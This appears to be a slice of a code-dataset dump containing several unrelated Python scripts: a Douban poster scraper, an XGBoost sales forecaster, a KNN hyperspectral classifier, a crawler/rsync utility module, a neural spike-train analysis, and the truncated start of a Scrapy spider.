__getPoster(self,id,mid):\n url = 'https://movie.douban.com/subject/%s/photos?type=R' % id\n html = self.__getResponse(url)\n if html is None: return False\n if '异常请求' in html.text: return False\n if 'window.location.href' in html.text and 'sec.douban.com' in html.text: return False\n if 'Your IP is restricted' in html.text: return False\n \n # if html is None: return\n html = BeautifulSoup(html.text,'html.parser')\n divs = html.find_all('div',{'class':'cover'})\n divs = [i.find('a').get('href') for i in divs]\n\n if len(divs) < 1:\n print('片子:%s 没有海报' % mid)\n data = dict(\n mid = mid,\n type = 'poster',\n site = self.name\n )\n self.pg.insert('res_defect', data)\n for i in divs:\n self.s.headers['Referer'] = i\n picid = i.split('/')[-2]\n picurl = 'https://img3.doubanio.com/view/photo/raw/public/p%s.jpg' % picid\n where = [\"resource LIKE '%\"+picid+\"%'\"]\n where.append(\"type = 'poster'\")\n where.append(\"site = '%s'\" % self.name)\n where.append(\"mid = '%s'\" % mid)\n rec = self.pg.select('res_img',where=where)\n if len(rec) > 0: continue\n # # rec = self.pg.select('res_img',where=[\"resource = '%s'\" % src])\n # # if len(rec) > 0: continue\n file = self.__downloads(picurl)\n data = dict(\n mid = mid,\n filename = '%s/%s.jpg' % (self.name, file),\n resource = i,\n type = 'poster',\n site = self.name,\n classes = 'resource'\n )\n self.pg.insert('res_img',data)\n \n def __downloads(self, url, type='img'):\n path = '%s/Picture/%s' % (self.path,self.name) if type == 'img' else '%s/Torrent/%s' % (self.path,self.name)\n if not os.path.exists(path): os.makedirs(path)\n file = hashlib.md5(url.encode('utf8')).hexdigest()\n path = '%s/%s.jpg' % (path,file) if type == 'img' else '%s/%s.torrent' % (path,file)\n data = self.__getResponse(url)\n with open(path, 'wb') as f: f.write(data.content)\n return file\n\n def getPoster(self):\n defect = self.pg.select('res_defect',['mid'],[\"site = '%s'\" % self.name,\"type = 'poster'\"])\n # defect = [str(i[0]) for i in defect]\n maxid = self.pg.custom(\"SELECT mid FROM res_img WHERE site = 'DouBan' and type = 'poster' ORDER BY mid DESC LIMIT 1 OFFSET 0\")\n pid = self.pg.custom(\"SELECT mid FROM res_img WHERE site = 'DouBan' and type = 'poster' GROUP BY mid\")\n pid = [str(i[0]) for i in pid+defect if i[0] != maxid[0][0]]\n ids = self.pg.select('res_info', ['id','mid','url'], ['\"mid\" NOT IN (%s)' % ','.join(pid)], order=['mid ASC'])\n for i in ids:\n doubanid = i[2].split('/')[-2]\n print('信息ID:%s 资源ID:%s ' % (i[0],i[1]))\n # break\n if self.__getPoster(doubanid,i[1]) is False: break\n \n\n\n def action(self):\n ids = self.pg.select('res_info', ['mid'])\n ids = [str(i[0]) for i in ids]\n res = self.pg.select('res_site',['id','title','year','imdb'],['\"id\" NOT IN (%s)' % ','.join(ids)],['id DESC'])\n today = datetime.date.today()\n for i in res:\n # id = self.apiSearch(i[1],i[2])\n id = self.webSearch(i[0],i[1],i[2],i[3])\n if id is None: continue\n self.__getPoster(id,i[0])\n content = self.getContent(id,i[3])\n if content is not None:\n content['mid'] = i[0]\n content['site'] = self.name\n content['record'] = today\n content['update'] = today\n self.pg.insert('res_info',content)\n print(i[0],i[1],'数据下载完成')\n\n def update(self):\n today = datetime.date.today()\n where = [\"update = '%s'\" % '2018-05-25']\n # where = [\"id = 1012\"]\n column = self.pg.getColumns('res_info')\n data = self.pg.select('res_info', column, where)\n data = pandas.DataFrame(list(data), columns=column)\n \n for key, val in data.iterrows():\n print(val.id)\n content = self.getContent(val.url.split('/')[-2],type='update')\n content['update'] = '2018-05-22'\n self.pg.update('res_info', ['id = %s' % val.id], content)\n # print(content[])\n # break\n\n\nif __name__ == '__main__':\n db = DouBan()\n db.action()\n # db.getPoster()\n # db.getPoster('3450654','157')\n # print(db.search('Paws P.I.','2018'))\n # res = db.webSearch(13664,'Paws P.I.','2018','http://www.imdb.com/title/tt8064262')\n # print(res)\n # db.getContent('ddd','ddd')\n # content = db.search('Messengers 2: The Scarecrow',2009)\n # content = db.search('xxxxxxxxxxxxxxxxxxxxx:xxx',2017)\n # print(content)\n # for k,v in content.items():\n # print(k, ' : ', v)\n # print()\n","sub_path":"DouBan.py","file_name":"DouBan.py","file_ext":"py","file_size_in_byte":15511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"461261339","text":"from sklearn.model_selection import train_test_split\nimport pandas as pd\nimport xgboost as xgb\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"../data/preprocessed/precrocessed2.csv\")\nres = pd.read_csv(\"../data/yancheng_testA_20171225.csv\")\nres_df = res.copy()\nres_df = pd.merge(res_df[['predict_date','class_id']],df,how='left',on=['class_id'])\nres_df = res_df.drop('sale_date',axis=1)\nres_df.rename(columns={'predict_date':'sale_date'},inplace = True)\n\n\n#print(df.sale_quantity.skew())\n\ndf_y = df['sale_quantity']\ndf_x = df.drop('sale_quantity',axis=1)\n\n#train_x,test_x,train_y,test_y = train_test_split(df_x,df_y,test_size=0.3)\n\nxgb_params = {\n 'eta' : 0.05,\n 'booster': 'gbtree',\n 'max_depth' : 8,\n 'subsample' : 0.7,\n 'colsample_bytree' : 0.7,\n 'objective' : 'reg:linear',\n 'eval_metric' : \"rmse\",\n 'silent' : 0,\n}\n\ntrain_y_log = np.log(df_y)\n#test_y_log = np.log(test_y)\n\ndtrain_log = xgb.DMatrix(df_x,train_y_log)\n#dvalid_log = xgb.DMatrix(test_x,test_y_log)\n#watchlist = [(dtrain_log,'train'),(dvalid_log,'eval')]\n\n#print(train_y_log.skew())\n\n#cv_output_log = xgb.cv(xgb_params,dtrain_log,num_boost_round=10000,early_stopping_rounds=5000,verbose_eval=50,show_stdv=False)\n#num_boost_rounds = len(cv_output_log)\n\n\nmodel = xgb.train(xgb_params,dtrain_log,num_boost_round=100000)\n\npredict = res_df.drop('sale_quantity',axis=1)\ndpredict = xgb.DMatrix(predict)\npred_quantity_log = model.predict(dpredict)\npred_quantity = np.exp(pred_quantity_log)\nsub_ = pd.DataFrame({u'sale_quantity':pred_quantity})\nres_df['sale_quantity'] = sub_['sale_quantity']\n\nresult = res_df.groupby(['class_id']).sale_quantity.sum().round()\npredict = result.reset_index()\nresult = pd.merge(res[['predict_date','class_id']],predict,how='left',on=['class_id'])\nresult = result.fillna(0)\nresult.columns = ['predict_date','class_id','predict_quantity']\nresult.to_csv(\"../result/xgb0125_without_watchlist.csv\",index=False,header=True)\n\n\n#fig,ax = plt.subplot(1,1,figsize=(8,13))\n#xgb.plot_importance(model,max_num_features=50,height=0.5,ax=ax)\n#plt.show()","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"394581762","text":"# -*-coding=utf-8 -*-\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np\nimport scipy.io as sio\nimport random\nimport matplotlib.pyplot as plt\nimport os\n\npath = os.path.join(\"C:\\JY\\Dataset\\Hyperspectral-Image\")# change this path for your dataset\nPaviaU = os.path.join(path,'PaviaU.mat')\nPaviaU_gt = os.path.join(path,'PaviaU_gt.mat')\nmethod_path = 'KNN'\n\n# 加载数据\ndata = sio.loadmat(PaviaU)\ndata_gt = sio.loadmat(PaviaU_gt)\nim = data['paviaU'] # pair with your dataset\nimGIS = data_gt['paviaU_gt']# pair with your dataset\n# 归一化\nim = (im - float(np.min(im)))\nim = im/np.max(im)\n\nsample_num = 200\ndeepth = im.shape[2]\nclasses = np.max(imGIS)\ntest_bg = False\n\n# 模型参数,neighbor k of knn\nneighuour_num = 5\n\ndata_pos = {}\ntrain_pos = {}\ntest_pos = {}\n\nfor i in range(1,classes+1):\n data_pos[i]=[]\n train_pos[i]=[]\n test_pos[i] = []\n\nfor i in range(imGIS.shape[0]):\n for j in range(imGIS.shape[1]):\n for k in range(1,classes+1):\n if imGIS[i,j]==k:\n data_pos[k].append([i,j])\n continue\n\nfor i in range(1,classes+1): \n indexies = random.sample(range(len(data_pos[i])),sample_num)\n for k in range(len(data_pos[i])):\n if k not in indexies:\n test_pos[i].append(data_pos[i][k])\n else:\n train_pos[i].append(data_pos[i][k])\n\ntrain = []\ntrain_label = []\ntest = []\ntest_label = []\n\nfor i in range(1,len(train_pos)+1):\n for j in range(len(train_pos[i])):\n row,col = train_pos[i][j]\n train.append(im[row,col])\n train_label.append(i)\n\nfor i in range(1,len(test_pos)+1):\n for j in range(len(test_pos[i])):\n row,col = test_pos[i][j]\n test.append(im[row,col])\n test_label.append(i)\nif not os.path.exists(os.path.join(method_path,'result')):\n os.makedirs(os.path.join(method_path,'result'))\n\nclf = KNeighborsClassifier(n_neighbors=neighuour_num)\ntrain = np.asarray(train)\ntrain_label = np.asarray(train_label)\nclf.fit(train,train_label)\nC = np.max(imGIS)\n\nmatrix = np.zeros((C,C))\nfor i in range(len(test)):\n r = clf.predict(test[i].reshape(-1,len(test[i])))\n matrix[r-1,test_label[i]-1] += 1\n\nac_list = []\nfor i in range(len(matrix)):\n ac = matrix[i, i] / sum(matrix[:, i])\n ac_list.append(ac)\n print(i+1,'class:','(', matrix[i, i], '/', sum(matrix[:, i]), ')', ac)\nprint('confusion matrix:')\nprint(np.int_(matrix))\nprint('total right num:', np.sum(np.trace(matrix)))\nprint('total test num:',np.sum(matrix))\naccuracy = np.sum(np.trace(matrix)) / np.sum(matrix)\nprint('Overall accuracy:', accuracy)\n# kappa\nkk = 0\nfor i in range(matrix.shape[0]):\n kk += np.sum(matrix[i]) * np.sum(matrix[:, i])\npe = kk / (np.sum(matrix) * np.sum(matrix))\npa = np.trace(matrix) / np.sum(matrix)\nkappa = (pa - pe) / (1 - pe)\nac_list = np.asarray(ac_list)\naa = np.mean(ac_list)\nprint('Average accuracy:',aa)\nprint('Kappa:', kappa)\nsio.savemat(os.path.join('result', 'result.mat'), {'oa': accuracy,'aa':aa,'kappa':kappa,'ac_list':ac_list,'matrix':matrix})\niG = np.zeros((imGIS.shape[0],imGIS.shape[1]))\nfor i in range(imGIS.shape[0]):\n for j in range(imGIS.shape[1]):\n if imGIS[i,j] == 0:\n if test_bg:\n iG[i,j] = (clf.predict(im[i,j].reshape(-1,len(im[i,j]))))\n else:\n iG[i,j]=0\n else:\n iG[i,j] = (clf.predict(im[i,j].reshape(-1,len(im[i,j]))))\nif test_bg:\n iG[0,0] = 0\nde_map = iG[::-1]\nfig, _ = plt.subplots()\nheight, width = de_map.shape\nfig.set_size_inches(width/100.0, height/100.0)\nplt.gca().xaxis.set_major_locator(plt.NullLocator())\nplt.gca().yaxis.set_major_locator(plt.NullLocator())\nplt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)\nplt.axis('off')\nplt.axis('equal')\nplt.pcolor(de_map, cmap='jet')\nplt.savefig(os.path.join('result', 'decode_map.png'),format='png',dpi=600)#bbox_inches='tight',pad_inches=0)\nplt.close()\nprint('decode map get finished')\n","sub_path":"KNN/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"21109856","text":"import os\nimport sys\nimport collections\nimport json\nimport shutil\nimport subprocess\nimport glob\n\nfrom bs4 import BeautifulSoup as bs4\nimport requests\n\nfile = sys.argv[0]\n\npathname = os.path.dirname(file)\n#print(pathname)\n#print('running from %s' % os.path.abspath(pathname))\n#print(file)\n\nrunning_from_path = os.path.abspath(pathname) + '/'\n#print(running_from_path)\n\n\ndef copy_to_remote(copied_file, remote_username, remote_pass, remote_hostname, remote_port, escaped_remote):\n #remote_username = 'u0_a97'\n #remote_hostname = '192.168.1.36'\n #escaped_remote = '/storage/1527-15E5/Android/data/com.termux/files/youtube/ashin-zaw-ti-ka-nyaungdone/'\n copied_file = running_from_path + copied_file\n \n print(glob.glob(copied_file))\n \n if os.path.isfile(copied_file):\n cmd = \"sshpass -p %s /usr/bin/rsync -P --partial -avzzz %s -e 'ssh -p %s' %s@%s:'%s'\" % (remote_pass, copied_file, remote_port, remote_username, remote_hostname, escaped_remote)\n\n result = 1 \n while result != 0:\n result = subprocess.Popen(cmd,shell=True).wait()\n #text = result.communicate()[0]\n #returncode = result.returncode\n \n print(result)\n\n if os.path.isfile(copied_file):\n print('Moving file...', copied_file)\n shutil.move(copied_file, '%sfinished/' % (running_from_path)) \n\n\ndef get_line_from_file(file_in):\n file_in = running_from_path + file_in\n for f in open(file_in, 'r'):\n yield f.split('|')[1]\n\n\ndef check_link(url):\n r = requests.get(url)\n return r.status_code\n \n\n\ndef splited_lines_generator(lines, n):\n for i in range(0, len(lines), n):\n yield lines[i: i + n]\n\ndef get_splited_lines(file_in, line_num):\n \n file_in = running_from_path + file_in\n files = [f.strip('\\n') for f in open(file_in, 'r') if len(f) > 2]\n \n \n for index, lines in enumerate(splited_lines_generator(files, line_num)):\n with open('{}{}.txt'.format(running_from_path, str(index)), 'w') as f:\n f.write('\\n'.join(lines))\n \n\ndef change(num):\n mm = ['၀','၁','၂','၃', '၄', '၅', '၆','၇','၈','၉']\n strmm = ''\n mmlist = list(map(int, str(num)))\n \n for i in mmlist:\n strmm += mm[i]\n\n return strmm\n \ndef get_json(file_in_1, file_in_2, file_out, playlist, description_title, source=''):\n\n file_in_1 = running_from_path+file_in_1\n file_in_2 = running_from_path+file_in_2\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n') for title in open(file_in_1)]\n #get_count = len(titles)\n #print(get_count)\n\n\n descriptions = [title.strip('\\n') for title in open(file_in_2)]\n #get_count_descriptions = len(descriptions)\n #print(get_count_descriptions)\n\n description_title = description_title\n source = source\n\n\n results = [] \n playlist = playlist\n\n for title, description in zip(titles, descriptions):\n \n #print(title)\n if len(title.split('|')[2]) > 100:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{}{}\".format(description_title, description, source), \n \"id\": \"{}\".format( title.split('|')[0].split('.')[0] )\n } \n\n #print('{}။{} greater than 100'.format(change(counter), title.split('။')[1]))\n print('{} greater than 100'.format(title.split('|')[2]))\n results.append(dict_title)\n else:\n if len(description.split('|')[1]) > 0:\n \n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{} ({}){}\".format(description_title, description.split('|')[0], description.split('|')[1], source), \n \"id\": \"{}\".format(title.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title)\n else:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title.split('|')[2]),\n \"description\": \"{}\\n{} {}\".format(description_title, description.split('|')[0], source), \n \"id\": \"{}\".format(title.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title) \n \n \n data = json.dumps(results, indent=4) \n with open(file_out, encoding='utf-8', mode='w') as f:\n json.dump(data, f) \n \n# convert result to json \ndef get_json_fb(file_in_1, file_in_2, file_out, playlist, description_title, source=''):\n\n file_in_1 = running_from_path+file_in_1\n file_in_2 = running_from_path+file_in_2\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n') for title in open(file_in_1)]\n #get_count = len(titles)\n #print(get_count)\n\n\n descriptions = [title.strip('\\n') for title in open(file_in_2)]\n #get_count_descriptions = len(descriptions)\n #print(get_count_descriptions)\n\n description_title = description_title\n source = source\n\n\n results = [] \n playlist = playlist\n\n for title, description in zip(titles, descriptions):\n \n #print(title)\n \n if len(\"{}\\n{} {}\".format(description_title, description.split('|')[2], source)) > 5000:\n print(len(\"{}\\n{} {}\".format(description_title, description.split('|')[2], source)))\n print(\"{}\\n{}\\n{} {}\".format(description.split('|')[0].split('.')[0],description_title, description.split('|')[2], source))\n \n if len(title) > 100:\n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title),\n \"description\": \"{}\\n{}{}\".format(description_title, description, source), \n \"id\": \"{}\".format( description.split('|')[0].split('.')[0] )\n } \n\n #print('{}။{} greater than 100'.format(change(counter), title.split('။')[1]))\n print('{} greater than 100'.format(title))\n results.append(dict_title)\n else:\n \n dict_title = {\n \"playlist\" : playlist,\n \"title\": \"{}\".format(title),\n \"description\": \"{}\\n{} {}\".format(description_title, description.split('|')[2], source), \n \"id\": \"{}\".format(description.split('|')[0].split('.')[0])\n } \n\n results.append(dict_title) \n \n \n data = json.dumps(results, indent=4) \n with open(file_out, encoding='utf-8', mode='w') as f:\n json.dump(data, f) \n \n \ndef convert_myanmar_number(file_in, file_out, count=1, desc=None):\n\n file_in = running_from_path+file_in\n \n file_out = running_from_path+file_out\n \n titles = [title.strip('\\n\\n\\n') for title in open(file_in)]\n \n \n if desc is None:\n \n with open(file_out, 'w') as f:\n counter = count \n for title in titles: \n \n if title.find('။') > 0: # found\n f.write( '{}။{}|\\n'.format(change(counter), title.split('|')[2].split('။')[1]) )\n else:\n f.write( '{}။{}|\\n'.format(change(counter), title.split('|')[2]) ) \n \n counter += 1 \n else:\n \n with open(file_out, 'w') as f:\n counter = count\n for dd in desc.items():\n \n for title in titles:\n \n number = int(title.split('|')[0].split('.')[0])\n #print(type(number))\n if dd[1][1] <= number <= dd[1][2]:\n print(dd[1][0])\n print(title.split('|')[2]) \n \n try:\n \n f.write('{}။{}|{}\\n'.format(change(counter), title.split('|')[2].split('။')[1], dd[1][0]))\n #print('{}။{}|\\n'.format(change(counter), title.split('|')[2].split('။')[1]))\n #print(title.split('|')[2])\n \n except IndexError as err:\n f.write('{}။{}|\\n'.format(change(counter), title.split('|')[2]))\n #print('{}။{}|\\n'.format(change(counter), title.split('|')[2]))\n \n \n #print('{}။{}'.format(change(counter), title))\n \n counter += 1 \n \n\ndef check_duplicate(file_in):\n\n file_in = running_from_path+file_in\n \n \n urls = [url.split('|')[1] for url in open(file_in)]\n \n for key, val in collections.Counter(urls).items():\n if val > 1:\n print(key, val)\n \ndef update_raw_titles_links(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n lines = [f.strip('\\n') for f in open(file_in)]\n \n with open(file_out, 'w') as f:\n counter = count\n for line in lines:\n #print(line.split('|')[1])\n #media = line.split('|')[0]\n url = line.split('|')[1]\n ext = url.split('.')[-1]\n media = '{:03d}'.format(counter)\n title = line.split('|')[2]\n if title.find('။') > 0: # found\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title.split('။')[1]) )\n else:\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title) ) \n \n counter += 1\n \ndef update_raw_reversed_titles_links(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n lines = [f.strip('\\n') for f in open(file_in)]\n \n with open(file_out, 'w') as f:\n counter = count\n for line in reversed(lines):\n #media = line.split('|')[0]\n url = line.split('|')[1]\n ext = url.split('.')[-1]\n media = '{:03d}'.format(counter)\n title = line.split('|')[2]\n if title.find('။') > 0: # found\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title.split('။')[1]) )\n else:\n f.write( '{}.{}|{}|{}။{}\\n'.format(media, ext, url, change(counter), title) ) \n \n counter += 1 \n \n \n\n'''\nparam -> get_url.txt\n'''\ndef get_html_mp4(file_in, file_out, count=1):\n \n file_in = running_from_path+file_in\n #print(file_in)\n file_out = running_from_path+file_out\n \n text = open(file_in, 'r').read()\n\n soup = bs4(text, 'html.parser')\n \n #files = param_folder + 'titles_links.txt'\n #files = 'titles_links.txt'\n\n count = count\n with open(file_out, 'w') as fd:\n\n for key in soup.find_all('a'):\n ext = key.get('href').split('.')[-1]\n #print(ext)\n if ext in ['mp4', 'wmv']:\n #print(ext)\n #print(key.get('href'))\n counter = '{:03d}'.format(count)\n fd.write('{}.{}|{}|{}\\n'.format(counter, ext, ''.join(key.get('href').split()), ' '.join(key.get_text().split())))\n\n count += 1\n \n'''\nparam -> get_url.txt\n'''\ndef get_html_mp3(file_in, file_out, count=1):\n\n file_in = running_from_path+file_in\n \n file_out = running_from_path+file_out\n\n text = open(file_in, 'r').read()\n\n soup = bs4(text, 'html.parser')\n \n \n count = count\n \n with open(file_out, 'w') as fd:\n\n for key in soup.find_all('a'):\n if '.mp3' in key.get('href'):\n counter = '{:03d}'.format(count)\n fd.write('{}.mp3|{}|{}\\n'.format(counter, ''.join(key.get('href').split()), ' '.join(key.get_text().split())))\n\n count += 1 \n'''\nif __name__ == '__main__':\n get_html_mp4('get_url.txt', 3)\n'''\n \n\n\n\n","sub_path":"future/crawler/crawler/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"286958145","text":"# -*- coding: utf-8 -*-\n# @Author: Guillaume Viejo\n# @Date: 2022-07-07 11:11:16\n# @Last Modified by: Guillaume Viejo\n# @Last Modified time: 2023-03-03 16:57:10\nimport numpy as np\nimport pandas as pd\nimport pynapple as nap\nfrom pylab import *\nfrom functions import *\nimport sys\nfrom pycircstat.descriptive import mean as circmean\nimport _pickle as cPickle\nfrom matplotlib.gridspec import GridSpec\nfrom itertools import combinations\nfrom scipy.stats import zscore\nfrom sklearn.linear_model import LogisticRegression, LogisticRegressionCV\nfrom sklearn.preprocessing import StandardScaler\nfrom xgboost import XGBClassifier\nfrom sklearn.decomposition import PCA, FastICA, KernelPCA\nfrom sklearn.manifold import Isomap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import f1_score\n\n\n############################################################################################### \n# GENERAL infos\n###############################################################################################\n# data_directory = '/mnt/DataRAID2/'\ndata_directory = '/mnt/ceph/users/gviejo'\ndatasets = np.genfromtxt(os.path.join(data_directory,'datasets_LMN_ADN.list'), delimiter = '\\n', dtype = str, comments = '#')\n\nsta_r = {'adn':[], 'lmn':[]} # trigger average of proba from the other structure spikes\ncc_down = {'adn':[], 'lmn':[]} # cross corr of adn and lmn / adn down states\nsta_r_down = {'adn':[], 'lmn':[]} # proba trigger on down states\n\n\n\nfor s in datasets:\n print(s)\n ############################################################################################### \n # LOADING DATA\n ###############################################################################################\n path = os.path.join(data_directory, s)\n data = nap.load_session(path, 'neurosuite')\n spikes = data.spikes\n position = data.position\n wake_ep = data.epochs['wake']\n sws_ep = data.read_neuroscope_intervals('sws')\n rem_ep = data.read_neuroscope_intervals('rem')\n down_ep = data.read_neuroscope_intervals('down')\n idx = spikes._metadata[spikes._metadata[\"location\"].str.contains(\"adn|lmn\")].index.values\n spikes = spikes[idx]\n \n ############################################################################################### \n # COMPUTING TUNING CURVES\n ###############################################################################################\n tuning_curves = nap.compute_1d_tuning_curves(spikes, position['ry'], 120, minmax=(0, 2*np.pi), ep = position.time_support.loc[[0]])\n tuning_curves = smoothAngularTuningCurves(tuning_curves) \n tcurves = tuning_curves\n SI = nap.compute_1d_mutual_info(tcurves, position['ry'], position.time_support.loc[[0]], (0, 2*np.pi))\n peaks = pd.Series(index=tcurves.columns,data = np.array([circmean(tcurves.index.values, tcurves[i].values) for i in tcurves.columns]))\n\n spikes.set_info(SI, peaks=peaks)\n\n adn = list(spikes.getby_category(\"location\")[\"adn\"].getby_threshold(\"SI\", 0.3).index)\n lmn = list(spikes.getby_category(\"location\")[\"lmn\"].getby_threshold(\"SI\", 0.1).index)\n\n # figure()\n # for i, n in enumerate(spikes.index):\n # subplot(10,10,i+1, projection='polar') \n # if n in adn:\n # plot(tcurves[n], color = 'red')\n # elif n in lmn:\n # plot(tcurves[n], color = 'green')\n # else:\n # plot(tcurves[n], color = 'grey')\n # xticks([])\n # yticks([])\n\n # sys.exit()\n\n tokeep = adn+lmn\n tokeep = np.array(tokeep)\n spikes = spikes[tokeep] \n\n velocity = computeLinearVelocity(position[['x', 'z']], position.time_support.loc[[0]], 0.2)\n newwake_ep = velocity.threshold(0.001).time_support \n\n ############################################################################################### \n # LOGIT\n ###############################################################################################\n groups = spikes.getby_category(\"location\")\n\n if len(groups['adn'])>6 and len(groups['lmn'])>8:\n\n ## MUA ########\n mua = {\n 0:nap.Ts(t=np.sort(np.hstack([groups['adn'][j].index.values for j in groups['adn'].index]))),\n 1:nap.Ts(t=np.sort(np.hstack([groups['lmn'][j].index.values for j in groups['lmn'].index])))}\n\n mua = nap.TsGroup(mua, time_support = spikes.time_support)\n\n ## DOWN CENTER ######\n down_center = (down_ep[\"start\"] + (down_ep['end'] - down_ep['start'])/2).values\n down_center = nap.TsGroup({\n 0:nap.Ts(t=down_center, time_support = sws_ep)\n })\n\n ## SHUFFLING #####\n bin_size_wake = 0.1\n bin_size_sws = 0.01\n\n gmap = {'adn':'lmn', 'lmn':'adn'}\n\n for i, g in enumerate(gmap.keys()):\n\n # WAKE \n count = groups[g].count(bin_size_wake, newwake_ep)\n rate = count/bin_size_wake\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=2)\n rate_wak = StandardScaler().fit_transform(rate)\n\n # WAKE SHUFFLE\n count = nap.randomize.shuffle_ts_intervals(groups[g]).count(bin_size_wake, newwake_ep)\n rate = count/bin_size_wake\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=2)\n rate_shu = StandardScaler().fit_transform(rate)\n\n # # adding a zero vector\n # rate_shu = np.vstack((rate_shu, np.zeros((1,rate_shu.shape[1]))))\n \n # SWS\n count = groups[g].count(bin_size_sws, sws_ep)\n time_index = count.index.values\n rate = count/bin_size_sws\n rate = rate.rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)\n rate_sws = StandardScaler().fit_transform(rate)\n\n X = np.vstack((rate_wak, rate_shu))\n y = np.hstack((np.zeros(len(rate_wak)), np.ones(len(rate_shu)))).astype(np.int32)\n Xt = rate_sws\n\n #####################\n bst = XGBClassifier(\n n_estimators=100, max_depth=20, \n learning_rate=0.0001, objective='binary:logistic', \n random_state = 0,# booster='dart',\n #eval_metric=f1_score)\n )\n bst.fit(X, y) \n # tmp = bst.predict_proba(Xt)[:,0]\n tmp = 1.0-bst.predict(Xt)\n ######################\n\n p = nap.Tsd(t = time_index, d = tmp, time_support = sws_ep)\n\n # figure()\n # subplot(121)\n # scatter(a[:, 0], a[:, 1], marker=\".\", c=y, alpha=0.4)\n # title(\"Truth\")\n # subplot(122)\n # scatter(a[:, 0], a[:, 1], marker=\".\", c=tmp, alpha=0.4)\n # title(\"Predicted\")\n\n # STA / neurons \n sta_neurons = nap.compute_event_trigger_average(groups[gmap[g]], p, bin_size_sws, (-0.4, 0.4), sws_ep)\n #sta_neurons = nap.compute_event_trigger_average(mua[[i]], p, bin_size_sws, (-0.4, 0.4), sws_ep) \n #sta_neurons = sta_neurons.as_dataframe().apply(zscore) \n \n # STA / down\n sta_down = nap.compute_event_trigger_average(down_center, p, bin_size_sws, (-0.4, 0.4), sws_ep)\n #sta_down = sta_down.as_dataframe().apply(zscore) \n\n # CC / down\n cc_d = nap.compute_eventcorrelogram(groups[g], down_center[0], bin_size_sws, 0.4, ep=sws_ep)\n\n ### SAVING ####\n sta_r[g].append(sta_neurons) # trigger average of reactivtion from the other structure spikes\n cc_down[g].append(cc_d) # cross corr of adn and lmn / adn down states\n sta_r_down[g].append(sta_down) # reactivation trigger on down states\n\nfor i, g in enumerate(['adn', 'lmn']):\n sta_r[g] = pd.concat(sta_r[g], 1)\n sta_r_down[g] = pd.concat(sta_r_down[g], 1)\n cc_down[g] = pd.concat(cc_down[g], 1)\n\n# sys.exit()\n\n\nfigure()\nsubplot(1,3,1)\nplot(sta_r['adn'].mean(1), label = 'adn r')\nplot(sta_r['lmn'].mean(1), label = 'lmn r')\nlegend()\nxlabel(\"Time from the other\")\ntitle(\"STA proba attractorness\")\n\nsubplot(1,3,2)\nplot(sta_r_down['adn'].mean(1), label = 'adn r')\nplot(sta_r_down['lmn'].mean(1), label = 'lmn r')\nxlabel(\"Time from ADN down center\")\ntitle(\"STA proba attractorness\")\nlegend()\n\nsubplot(1,3,3)\nplot(cc_down['adn'].mean(1), label = 'adn')\nplot(cc_down['lmn'].mean(1), label = 'lmn')\nlegend()\nxlabel(\"Time from ADN down center\")\ntitle(\"CC\")\n\n\nfigure()\nsubplot(2,2,1)\nplot(sta_r['adn'], label = 'adn r')\ntitle(\"STA proba attractorness\")\nxlabel(\"Time from LMN spikes\")\nlegend()\n\nsubplot(2,2,3)\nplot(sta_r['lmn'], label = 'lmn r')\nlegend()\nxlabel(\"Time from ADN spikes\")\n\n\nsubplot(2,2,2)\nplot(sta_r_down['adn'].mean(1), label = 'adn r')\ntitle(\"STA proba attractorness\")\n\nsubplot(2,2,4)\nplot(sta_r_down['lmn'].mean(1), label = 'lmn r')\nxlabel(\"Time from ADN down center\")\n\nshow()\n","sub_path":"pyna/main_pyna_LMN_ADN_LOGIT.py","file_name":"main_pyna_LMN_ADN_LOGIT.py","file_ext":"py","file_size_in_byte":9018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"562052598","text":"# -*- coding: utf-8 -*-\nimport pprint, re, requests, scrapy\n\nfrom forum_duanzibar_com.items import ForumDuanzibarComItem\nfrom forum_duanzibar_com.settings import API_SETTINGS\n\n\nclass CosplayTorikoComSpider(scrapy.Spider):\n\tname = \"cosplay_toriko_com\"\n\tallowed_domains = [\"cosplay-toriko.com\"]\n\tstart_urls = ['http://cosplay-toriko.com']\n\n\tcategories = []\n\tfid = 61\n\tpages = 20\n\t\n\n\tdef image_handle_redirect(self, image_url, headers={}):\n\t\tresponse = requests.head(image_url, headers=headers)\n\t\tif response.status_code in range(300, 400):\n\t\t\timage_url = response.headers[\"Location\"]\n\t\treturn 